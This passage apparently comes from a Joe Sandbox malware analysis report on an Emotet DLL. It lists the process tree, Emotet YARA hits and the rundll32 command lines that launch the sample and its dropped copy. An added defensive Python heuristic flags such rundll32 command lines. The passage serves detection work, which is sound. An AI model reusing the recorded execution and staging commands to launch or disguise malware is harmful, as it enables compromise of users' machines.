                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.1030937060.0000000000DBA000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:54:09
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:54:14
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:54:14
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:54:15
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:54:18
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:54:25
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:54:27
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:54:46
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:54:59
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, Author: Joe Security

                          General

                          Start time:00:55:16
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:55:39
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:00:55:54
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
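
                          Triage note (added example, not part of the Joe Sandbox report): the rundll32.exe command lines recorded above show the pattern worth alerting on. The sample is first loaded from the user's Desktop through export names that look random (ajkaibu, akyncbgollmj), then through an export called Control_RunDLL that mimics the legitimate shell32 entry point, and finally the copy dropped as vimpwfmepmyc.nyd inside a fresh Cwisdx subdirectory of SysWOW64 (also logged under the System32 path, as a WoW64 process sees it) is run the same way. The Python below applies those heuristics to constructed process-creation command lines: the five lines are copied from this process tree, the two benign lines and the extension, export and directory allowlists are assumptions made for this example.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the rundll32 command lines recorded in the process
# tree above (Joe Sandbox analysis 532314), followed by two benign rundll32
# invocations added here for contrast (assumed, not from the report).
SAMPLE_CMDLINES = [
    r'rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu',
    r'rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj',
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL',
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj',
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl',   # benign (constructed)
    r'rundll32.exe C:\Windows\System32\inetcpl.cpl,LaunchConnectionDialog',   # benign (constructed)
]

# Host binary, module path (quoted or bare) and entry point of a rundll32 command line.
RUNDLL_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32\.exe"|\S*rundll32\.exe)\s+'
    r'(?:"(?P<qmod>[^"]+)"|(?P<mod>[^\s,]+))'
    r'\s*,\s*(?P<entry>\S+)?',
    re.IGNORECASE,
)

# Heuristic allowlists: assumptions for this example, tune them for your estate.
MODULE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
KNOWN_ENTRIES = {"control_rundll", "launchconnectiondialog", "shellexec_rundll"}
SYSTEM_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_DIRS = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")


@dataclass
class Verdict:
    cmdline: str
    module: Optional[str] = None
    entry: Optional[str] = None
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def analyse(cmdline: str) -> Verdict:
    """Apply the rundll32 heuristics to a single process command line."""
    v = Verdict(cmdline)
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return v                                   # not a rundll32 invocation at all
    v.module = m.group("qmod") or m.group("mod")
    v.entry = m.group("entry")
    low = v.module.lower()
    parent = ntpath.dirname(low)                   # '' for a bare module name (search-path load)
    ext = ntpath.splitext(low)[1]

    # 1. Renamed payload: a PE loaded from a file that is not a .dll/.cpl/... (the .nyd copy).
    if ext not in MODULE_EXTS:
        v.indicators.append(f"module extension {ext!r} is not a DLL-type extension")
    # 2. Payload staged in a new subdirectory of System32/SysWOW64 (the Cwisdx folder).
    for root in SYSTEM_ROOTS:
        if low.startswith(root + "\\") and parent != root:
            v.indicators.append(f"module lives in a subdirectory of {root}")
    # 3. Payload loaded from a user-writable location (the Desktop drop).
    if "\\users\\" in low and any(d in low for d in USER_DIRS):
        v.indicators.append("module loaded from a user-writable path")
    # 4. Export checks for modules with an explicit path outside the system roots:
    #    Control_RunDLL on a non-system module mimics shell32; anything else
    #    not on the allowlist is treated as a random-looking export name.
    if v.entry and parent and parent not in SYSTEM_ROOTS:
        if v.entry.lower() == "control_rundll":
            v.indicators.append("Control_RunDLL export on a module outside the system directory")
        elif v.entry.lower() not in KNOWN_ENTRIES:
            v.indicators.append(f"unrecognised export {v.entry!r} on a non-system module")
    return v


def triage(cmdlines: List[str]) -> List[Verdict]:
    """Run analyse() over a batch of command lines, preserving order."""
    return [analyse(c) for c in cmdlines]


def flagged_modules(cmdlines: List[str]) -> List[str]:
    """Distinct module paths behind suspicious verdicts, for pivoting to file IOCs."""
    return sorted({v.module for v in triage(cmdlines) if v.suspicious})


if __name__ == "__main__":
    for v in triage(SAMPLE_CMDLINES):
        tag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"[{tag:10}] {v.cmdline}")
        for i in v.indicators:
            print(f"             - {i}")
```

                          Each of the five command lines from this report trips at least two indicators, while the two benign invocations trip none; in practice the same checks map onto a Sysmon Event ID 1 or Security 4688 feed keyed on the CommandLine field, and the flagged module paths give the file IOCs to sweep for.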

                          Disassembly

                          Code Analysis
